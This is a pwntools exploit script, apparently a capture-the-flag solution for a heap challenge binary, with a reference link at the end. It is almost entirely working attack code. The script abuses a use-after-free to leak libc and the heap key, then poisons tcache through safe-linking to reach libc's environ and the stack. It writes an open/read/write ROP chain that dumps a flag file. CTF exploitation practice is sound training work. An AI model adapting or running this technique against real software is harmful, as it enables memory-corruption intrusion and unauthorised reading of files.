from pwn import *
context.log_level = 'debug'
context.arch='amd64'
#io=process("./pwn")
p = process('./pwn')
# p=remote('1.14.71.254',28880)
#elf=ELF('./pwn')
#p = remote('59.110.24.117',33320)
libc = ELF('./libc.so.6')
rl = lambda a=False : p.recvline(a)
ru = lambda a,b=True : p.recvuntil(a,b)
rn = lambda x : p.recvn(x)
sn = lambda x : p.send(x)
sl = lambda x : p.sendline(x)
sa = lambda a,b : p.sendafter(a,b)
sla = lambda a,b : p.sendlineafter(a,b)
irt = lambda : p.interactive()
dbg = lambda text=None : gdb.attach(p, text)
# lg = lambda s,addr : log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s,addr))
lg = lambda s : log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s, eval(s)))
uu32 = lambda data : u32(data.ljust(4, b'\x00'))
uu64 = lambda data : u64(data.ljust(8, b'\x00'))
def dbg():
gdb.attach(p)
pause()
menu = 'Choice: '
def add():
p.sendlineafter(menu, '1')
def show(index):
p.sendlineafter(menu, '3')
p.sendlineafter('Idx:', str(index))
def delete(index):
p.sendlineafter(menu, '2')
p.sendlineafter('Idx:', str(index))
def edit(index, size, content):
p.sendlineafter(menu, '4')
p.sendlineafter('Idx:', str(index))
p.sendlineafter('Size:', str(size))
p.sendafter('Content:', content)
for i in range(10):
add()
for i in range(9):
delete(i)
edit(7,0x10,'\x01')
show(7)
libc_base=u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))-0x1e0c01
lg('libc_base')
environ = libc_base + libc.sym['environ']
lg('environ')
edit(7,0x10,'\x00')
show(0)
ru('\n')
key=u64(p.recv(5).ljust(8,'\x00'))
heapbase=key<<12
lg('key')
payload1=p64(key^environ)+p64(0)
# edit(6,0x10,payload1)
for i in range(5):
add()#10-14
edit(1,0x10,payload1)
# dbg()
add()#15
add()#16
show(16)
# show(11)
stack_addr = u64(p.recvuntil('\x7f')[-6:].ljust(8, b'\x00')) - 0x138
lg('stack_addr')
# edit(6,)
delete(3)
delete(4)
payload2=p64(key^stack_addr)+p64(0)
edit(4,0x10,payload2)
add()#17
add()#18
pop_rdi_ret = libc_base + 0x0000000000028a55
#pop_rsi_ret = libc_base + libc.search(asm('pop rsi;ret;')).__next__()
pop_rsi_ret = libc_base + 0x000000000002a4cf
#pop_rdx_ret = libc_base + libc.search(asm('pop rdx;ret;')).__next__()
pop_rdx_ret = 0x00000000000c7f32 + libc_base
read_addr = libc_base + libc.sym['read']
open_addr = libc_base + libc.sym['open']
write_addr = libc_base + libc.sym['write']
flag_addr = stack_addr + 0x10
payload3 = p64(0) * 2
payload3 += b'./flag\x00\x00'
# open('./flag', 0)
payload3 += p64(pop_rdi_ret) + p64(flag_addr) + p64(pop_rsi_ret) + p64(0) + p64(open_addr)
# read(3, stack_addr - 0x200, 0x50)
payload3 += p64(pop_rdi_ret) + p64(3) + p64(pop_rsi_ret) + p64(stack_addr - 0x200) + p64(pop_rdx_ret) + p64(0x50) + p64(read_addr)
# write(1, stack_addr - 0x200, 0x50)
payload3 += p64(pop_rdi_ret) + p64(1) + p64(pop_rsi_ret) + p64(stack_addr - 0x200) + p64(pop_rdx_ret) + p64(0x50) + p64(write_addr)
dbg()
edit(18,0x100,payload3)
# dbg()
irt()
参考链接:https://blog.csdn.net/zzq487782568/article/details/125561195